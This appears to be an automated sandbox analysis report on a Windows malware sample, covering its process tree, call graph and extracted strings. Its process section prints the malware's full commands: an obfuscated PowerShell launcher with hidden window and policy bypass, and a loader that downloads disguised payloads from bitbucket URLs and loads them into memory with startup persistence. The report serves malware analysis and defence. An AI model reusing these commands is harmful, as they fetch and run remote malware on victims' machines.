C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE
#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ
#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:13:02:40
Start date:02/10/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:13:02:46
Start date:02/10/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Imagebase:0x7ff7604d0000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:25%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:43.1%
Total number of Nodes:981
Total number of Limit Nodes:49
7ff6fd214f2c 24 API calls 2948->2949 2950 7ff6fd216dfe 2949->2950 2955 7ff6fd216852 2950->2955 2958 7ff6fd217958 GetLastError 2950->2958 2952 7ff6fd217e08 CharPrevA 2951->2952 2954 7ff6fd216e7f CreateFileA LocalFree 2952->2954 2954->2950 2956 7ff6fd216ecb CloseHandle GetFileAttributesA 2954->2956 2955->2915 2955->2916 2956->2950 2957->2925 2958->2955 2959->2787 2960->2782 2962 7ff6fd21258a 2961->2962 2963 7ff6fd21254d 2961->2963 2964 7ff6fd21258f 2962->2964 2965 7ff6fd2125d3 2962->2965 2966 7ff6fd2110bc _vsnprintf 2963->2966 2968 7ff6fd2110bc _vsnprintf 2964->2968 2969 7ff6fd212585 2965->2969 2973 7ff6fd2110bc _vsnprintf 2965->2973 2967 7ff6fd212565 2966->2967 2970 7ff6fd214f2c 24 API calls 2967->2970 2972 7ff6fd2125a7 2968->2972 2971 7ff6fd2186f0 7 API calls 2969->2971 2970->2969 2974 7ff6fd212631 2971->2974 2975 7ff6fd214f2c 24 API calls 2972->2975 2976 7ff6fd2125ef 2973->2976 2974->2788 2975->2969 2977 7ff6fd214f2c 24 API calls 2976->2977 2977->2969 2978->2776 2980 7ff6fd215ed1 2979->2980 2990 7ff6fd215f46 2979->2990 2981 7ff6fd2155c0 29 API calls 2980->2981 2983 7ff6fd215ee8 2981->2983 2982 7ff6fd2186f0 7 API calls 2984 7ff6fd215f5c 2982->2984 2985 7ff6fd215ef1 #21 2983->2985 2983->2990 2984->2800 2984->2801 2986 7ff6fd215f0c 2985->2986 2985->2990 2987 7ff6fd2159b0 CloseHandle 2986->2987 2986->2990 2988 7ff6fd215f2e 2987->2988 2989 7ff6fd215f33 #23 2988->2989 2988->2990 2989->2990 2990->2982 2992 7ff6fd211649 2991->2992 3084 7ff6fd211558 2992->3084 2995 7ff6fd217e08 CharPrevA 2997 7ff6fd2116dc 2995->2997 2996 7ff6fd217fb8 2 API calls 2998 7ff6fd21177f 2996->2998 2997->2996 2999 7ff6fd211788 CompareStringA 2998->2999 3000 7ff6fd2119d3 2998->3000 2999->3000 3001 7ff6fd2117bb GetFileAttributesA 2999->3001 3002 7ff6fd217fb8 2 API calls 3000->3002 3003 7ff6fd2119ab 3001->3003 3004 7ff6fd2117d5 3001->3004 3005 7ff6fd2119e0 3002->3005 3010 7ff6fd214f2c 24 API calls 3003->3010 3004->3003 3009 7ff6fd211558 2 API calls 3004->3009 3006 7ff6fd2119e9 CompareStringA 
3005->3006 3007 7ff6fd211a83 LocalAlloc 3005->3007 3006->3007 3008 7ff6fd211a18 LocalAlloc 3006->3008 3007->3003 3011 7ff6fd211aa3 GetFileAttributesA 3007->3011 3008->3003 3024 7ff6fd211a6a 3008->3024 3012 7ff6fd2117f9 3009->3012 3028 7ff6fd2118c5 3010->3028 3021 7ff6fd211ab9 3011->3021 3013 7ff6fd211823 LocalAlloc 3012->3013 3016 7ff6fd211558 2 API calls 3012->3016 3013->3003 3017 7ff6fd211847 GetPrivateProfileIntA GetPrivateProfileStringA 3013->3017 3014 7ff6fd211b82 3015 7ff6fd2186f0 7 API calls 3014->3015 3018 7ff6fd211b9e 3015->3018 3016->3013 3020 7ff6fd211940 3017->3020 3017->3028 3018->2831 3022 7ff6fd211951 GetShortPathNameA 3020->3022 3023 7ff6fd211973 3020->3023 3029 7ff6fd211b0c 3021->3029 3022->3023 3027 7ff6fd2110bc _vsnprintf 3023->3027 3026 7ff6fd2110bc _vsnprintf 3024->3026 3026->3028 3027->3028 3028->3014 3092 7ff6fd212ae8 3029->3092 3031 7ff6fd211db6 3030->3031 3032 7ff6fd211fff 3030->3032 3035 7ff6fd2110bc _vsnprintf 3031->3035 3038 7ff6fd211e0d 3031->3038 3033 7ff6fd2186f0 7 API calls 3032->3033 3034 7ff6fd21200e 3033->3034 3034->2831 3036 7ff6fd211dd6 RegQueryValueExA 3035->3036 3036->3031 3037 7ff6fd211e2c GetSystemDirectoryA 3036->3037 3039 7ff6fd217e08 CharPrevA 3037->3039 3038->3037 3040 7ff6fd211e0f RegCloseKey 3038->3040 3041 7ff6fd211e50 LoadLibraryA 3039->3041 3040->3032 3042 7ff6fd211f3b GetModuleFileNameA 3041->3042 3043 7ff6fd211e6c GetProcAddress FreeLibrary 3041->3043 3045 7ff6fd211f5e RegCloseKey 3042->3045 3048 7ff6fd211ece 3042->3048 3043->3042 3044 7ff6fd211ea4 GetSystemDirectoryA 3043->3044 3046 7ff6fd211ebb 3044->3046 3044->3048 3045->3032 3047 7ff6fd217e08 CharPrevA 3046->3047 3047->3048 3048->3048 3049 7ff6fd211ef7 LocalAlloc 3048->3049 3050 7ff6fd211f1b 3049->3050 3051 7ff6fd211f74 3049->3051 3052 7ff6fd214f2c 24 API calls 3050->3052 3053 7ff6fd2110bc _vsnprintf 3051->3053 3054 7ff6fd211f39 3052->3054 3055 7ff6fd211faa 3053->3055 3054->3045 3055->3055 3056 7ff6fd211fb3 RegSetValueExA RegCloseKey LocalFree 3055->3056 
3056->3032 3058 7ff6fd214874 CreateProcessA 3057->3058 3068 7ff6fd21486d 3057->3068 3059 7ff6fd2148ca WaitForSingleObject GetExitCodeProcess 3058->3059 3060 7ff6fd2149bb 3058->3060 3064 7ff6fd214901 3059->3064 3120 7ff6fd217958 GetLastError 3060->3120 3062 7ff6fd2186f0 7 API calls 3065 7ff6fd214a37 3062->3065 3063 7ff6fd2149c0 GetLastError FormatMessageA 3066 7ff6fd214f2c 24 API calls 3063->3066 3070 7ff6fd2123c0 19 API calls 3064->3070 3072 7ff6fd214932 CloseHandle CloseHandle 3064->3072 3065->2831 3066->3068 3068->3062 3069 7ff6fd2149b2 3069->3068 3071 7ff6fd214955 3070->3071 3071->3072 3072->3068 3072->3069 3074 7ff6fd217c85 3073->3074 3075 7ff6fd217e08 CharPrevA 3074->3075 3076 7ff6fd217cc3 GetFileAttributesA 3075->3076 3077 7ff6fd217cf6 LoadLibraryA 3076->3077 3078 7ff6fd217cd9 3076->3078 3080 7ff6fd217d09 3077->3080 3078->3077 3079 7ff6fd217cdd LoadLibraryExA 3078->3079 3079->3080 3081 7ff6fd2186f0 7 API calls 3080->3081 3082 7ff6fd217d19 3081->3082 3082->2856 3083->2819 3085 7ff6fd211579 3084->3085 3087 7ff6fd211591 3085->3087 3088 7ff6fd2115c1 3085->3088 3106 7ff6fd217f48 3085->3106 3089 7ff6fd217f48 2 API calls 3087->3089 3088->2995 3088->2997 3090 7ff6fd21159f 3089->3090 3090->3088 3091 7ff6fd217f48 2 API calls 3090->3091 3091->3090 3093 7ff6fd212b1f 3092->3093 3096 7ff6fd212d41 3092->3096 3094 7ff6fd212b28 GetModuleFileNameA 3093->3094 3093->3096 3094->3096 3105 7ff6fd212b50 3094->3105 3095 7ff6fd2186f0 7 API calls 3097 7ff6fd212d54 3095->3097 3096->3095 3097->3014 3098 7ff6fd212b54 IsDBCSLeadByte 3098->3105 3099 7ff6fd212b79 CharNextA CharUpperA 3102 7ff6fd212c6d CharUpperA 3099->3102 3099->3105 3100 7ff6fd212d13 CharNextA 3101 7ff6fd212d25 CharNextA 3100->3101 3101->3096 3101->3098 3102->3105 3104 7ff6fd212bbe CharPrevA 3104->3105 3105->3098 3105->3099 3105->3100 3105->3101 3105->3104 3111 7ff6fd217ea0 3105->3111 3110 7ff6fd217f60 3106->3110 3107 7ff6fd217f6a IsDBCSLeadByte 3109 7ff6fd217f99 3107->3109 3107->3110 3108 7ff6fd217f82 CharNextA 3108->3110 
3109->3085 3110->3107 3110->3108 3110->3109 3112 7ff6fd217eb8 3111->3112 3112->3112 3113 7ff6fd217ec1 CharPrevA 3112->3113 3114 7ff6fd217edd CharPrevA 3113->3114 3115 7ff6fd217ef4 3114->3115 3116 7ff6fd217ed5 3114->3116 3117 7ff6fd217f27 3115->3117 3118 7ff6fd217efe CharPrevA 3115->3118 3119 7ff6fd217f15 CharNextA 3115->3119 3116->3114 3116->3118 3117->3105 3118->3117 3118->3119 3119->3117 3120->3063 3121->2871 3123 7ff6fd212349 RegQueryInfoKeyA RegCloseKey 3122->3123 3124 7ff6fd2123ad 3122->3124 3123->3124 3124->2527 3126 7ff6fd2122db 3125->3126 3127 7ff6fd212271 3125->3127 3129 7ff6fd2186f0 7 API calls 3126->3129 3128 7ff6fd217e08 CharPrevA 3127->3128 3130 7ff6fd212284 WritePrivateProfileStringA _lopen 3128->3130 3131 7ff6fd2122ed 3129->3131 3130->3126 3132 7ff6fd2122b7 _llseek _lclose 3130->3132 3131->2527 3132->3126 3245 7ff6fd21874b RtlCaptureContext RtlLookupFunctionEntry 3246 7ff6fd2187d7 3245->3246 3247 7ff6fd218795 RtlVirtualUnwind 3245->3247 3250 7ff6fd218714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3246->3250 3247->3246 3251 7ff6fd215aca 3252 7ff6fd215a9e 3251->3252 3253 7ff6fd215ad0 GlobalFree 3251->3253 3254 7ff6fd213a4e 3255 7ff6fd213a73 3254->3255 3256 7ff6fd213b49 3254->3256 3255->3256 3257 7ff6fd213a88 3255->3257 3258 7ff6fd213b51 GetDesktopWindow 3255->3258 3259 7ff6fd213a94 3256->3259 3260 7ff6fd213c5a EndDialog 3256->3260 3261 7ff6fd213abb 3257->3261 3262 7ff6fd213a8c 3257->3262 3263 7ff6fd214dc8 14 API calls 3258->3263 3260->3259 3261->3259 3266 7ff6fd213ac5 ResetEvent 3261->3266 3262->3259 3265 7ff6fd213a9b TerminateThread 3262->3265 3264 7ff6fd213b6f 3263->3264 3267 7ff6fd213b78 GetDlgItem SendMessageA GetDlgItem SendMessageA 3264->3267 3268 7ff6fd213bdb SetWindowTextA CreateThread 3264->3268 3265->3260 3269 7ff6fd214f2c 24 API calls 3266->3269 3267->3268 3268->3259 3270 7ff6fd213c28 3268->3270 3271 7ff6fd213b03 3269->3271 3272 7ff6fd214f2c 24 API calls 3270->3272 3273 7ff6fd213b24 SetEvent 
3271->3273 3274 7ff6fd213b0c SetEvent 3271->3274 3272->3256 3275 7ff6fd213c80 4 API calls 3273->3275 3274->3259 3275->3256 3276 7ff6fd2134ce 3277 7ff6fd2134eb CallWindowProcA 3276->3277 3278 7ff6fd2134dc 3276->3278 3279 7ff6fd2134e7 3277->3279 3278->3277 3278->3279 3280 7ff6fd21868e 3281 7ff6fd2186a6 3280->3281 3282 7ff6fd21869d _exit 3280->3282 3283 7ff6fd2186bb 3281->3283 3284 7ff6fd2186af _cexit 3281->3284 3282->3281 3284->3283 3285 7ff6fd2189ce 3286 7ff6fd2189df 3285->3286 3287 7ff6fd218a02 3285->3287 3286->3287 3288 7ff6fd2189fb ?terminate@ 3286->3288 3288->3287 3289 7ff6fd217b0f 3290 7ff6fd217b5d 3289->3290 3291 7ff6fd217e08 CharPrevA 3290->3291 3292 7ff6fd217b95 CreateFileA 3291->3292 3293 7ff6fd217bde WriteFile 3292->3293 3294 7ff6fd217bd0 3292->3294 3295 7ff6fd217c02 CloseHandle 3293->3295 3297 7ff6fd2186f0 7 API calls 3294->3297 3295->3294 3298 7ff6fd217c35 3297->3298 2235 7ff6fd2158d0 2242 7ff6fd213c80 2235->2242 2238 7ff6fd2158fa 2239 7ff6fd215902 WriteFile 2239->2238 2240 7ff6fd215939 2239->2240 2240->2238 2241 7ff6fd215965 SendDlgItemMessageA 2240->2241 2241->2238 2243 7ff6fd213c8c MsgWaitForMultipleObjects 2242->2243 2244 7ff6fd213cb4 PeekMessageA 2243->2244 2245 7ff6fd213d25 2243->2245 2244->2243 2246 7ff6fd213cd9 2244->2246 2245->2238 2245->2239 2246->2243 2246->2245 2247 7ff6fd213ce7 DispatchMessageA 2246->2247 2248 7ff6fd213cf8 PeekMessageA 2246->2248 2247->2248 2248->2246 3299 7ff6fd2155ba 3300 7ff6fd21557c 3299->3300 3301 7ff6fd2155be 3299->3301 3302 7ff6fd21563d lstrcmpA 3301->3302 3303 7ff6fd215610 3301->3303 3305 7ff6fd215634 3302->3305 3306 7ff6fd215694 3302->3306 3304 7ff6fd214f2c 24 API calls 3303->3304 3304->3305 3306->3305 3307 7ff6fd2156e8 CreateFileA 3306->3307 3307->3305 3309 7ff6fd21571e 3307->3309 3308 7ff6fd2157a1 CreateFileA 3308->3305 3309->3305 3309->3308 3310 7ff6fd215789 CharNextA 3309->3310 3311 7ff6fd215772 CreateDirectoryA 3309->3311 3310->3309 3311->3310 3312 7ff6fd214b3b SendMessageA 3313 7ff6fd21397e 3314 7ff6fd21399a 
3313->3314 3315 7ff6fd213992 3313->3315 3316 7ff6fd213a2c EndDialog 3314->3316 3319 7ff6fd21399f 3314->3319 3315->3314 3317 7ff6fd2139ce GetDesktopWindow 3315->3317 3316->3319 3318 7ff6fd214dc8 14 API calls 3317->3318 3320 7ff6fd2139e5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3318->3320 3320->3319 3321 7ff6fd215f7e 3322 7ff6fd2151f8 7 API calls 3321->3322 3323 7ff6fd215f9b FindResourceA LoadResource LockResource 3322->3323 3324 7ff6fd215fec 3323->3324 3325 7ff6fd2161bf 3323->3325 3326 7ff6fd216046 3324->3326 3327 7ff6fd215ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 3324->3327 3328 7ff6fd215e44 33 API calls 3326->3328 3327->3326 3329 7ff6fd21604b 3328->3329 3330 7ff6fd216059 #20 3329->3330 3331 7ff6fd21604f 3329->3331 3330->3331 3332 7ff6fd2160c1 #22 3330->3332 3335 7ff6fd214f2c 24 API calls 3331->3335 3333 7ff6fd216143 3332->3333 3334 7ff6fd216105 #23 3332->3334 3336 7ff6fd216151 FreeResource 3333->3336 3337 7ff6fd216165 3333->3337 3334->3331 3334->3333 3335->3333 3336->3337 3338 7ff6fd21618f 3337->3338 3339 7ff6fd214f2c 24 API calls 3337->3339 3338->3325 3340 7ff6fd2161a1 SendMessageA 3338->3340 3339->3338 3340->3325 3341 7ff6fd218400 __getmainargs

Callgraph


Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: 124$<None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
• API String ID: 2679723528-2787484224
• Opcode ID: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
• Instruction ID: b5c7e3400dee5e06f1c13ab6e52c1bb56151e6abc0a8c524d994a4f49ef11cf5
• Opcode Fuzzy Hash: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
• Instruction Fuzzy Hash: B1025F75A0868296E7209B14EA406B977A0FB88748F548135DB6DC36D4FF3EF546C7C0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
• String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
• API String ID: 1522771004-2414900631
• Opcode ID: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
• Instruction ID: 2f2507680007d9ccc1481167e5276ce3f86079b58562bc1573bc0a56eb08ee84
• Opcode Fuzzy Hash: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
• Instruction Fuzzy Hash: 0F814E36A18B8296E7118F21E9502B9B7A0FB89B54F449131DA6EC3794FF3EE505C7C0

Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                • API String ID: 383838535-981289760
                                                                                                                • Opcode ID: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
                                                                                                                • Instruction ID: ec1c081ab1b63e24e6ed517fd5dac6a9cdf440d53cebfa3a7658401d2583b544
                                                                                                                • Opcode Fuzzy Hash: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
                                                                                                                • Instruction Fuzzy Hash: 2FF18D62A0878295EB128F24A6402B97BA1EB45794F948235DB6DC37D5FF3EF509C3C0

Control-flow Graph
• Function 7ff6fd2168f0-7ff6fd216d92. Win32 APIs referenced in the graph: LocalAlloc, LocalFree, lstrcmpA, GetTempPathA, GetWindowsDirectoryA, GetDriveTypeA, GetFileAttributesA, GetDiskFreeSpaceA, MulDiv, CreateDirectoryA, SetFileAttributesA. Internal calls: 7ff6fd2151f8, 7ff6fd214f2c, 7ff6fd217958, 7ff6fd217d28, 7ff6fd2186f0, 7ff6fd216710, 7ff6fd212490, 7ff6fd216f14, 7ff6fd217e08.
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
• String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
• API String ID: 3973824516-1216675450
• Opcode ID: 2795f33d37122c8914f55bb84a2c421aa931674af6ba2d52a3768653f76fb3eb
• Instruction ID: 88e94269af15a1ef467c579d22fe24511c0045b1ea398d1216960807da215f92
• Opcode Fuzzy Hash: 2795f33d37122c8914f55bb84a2c421aa931674af6ba2d52a3768653f76fb3eb
• Instruction Fuzzy Hash: 97D17F22A1868286EB109B2096502BEB7A1FB85745F54C135DB6EC76D4FF3EF905CBC0

Control-flow Graph
• Function 7ff6fd212edc-7ff6fd21320b. Win32 APIs referenced in the graph: memset, CreateEventA, SetEvent, CreateMutexA, GetLastError, FindResourceExA, LoadResource, CloseHandle, plus one import by ordinal (#17 at 7ff6fd213145). Internal calls: 7ff6fd218da9, 7ff6fd2151f8, 7ff6fd214f2c, 7ff6fd2186f0, 7ff6fd217320, 7ff6fd212034, 7ff6fd213d34, 7ff6fd211258, 7ff6fd217d28.
Memory Dump Source
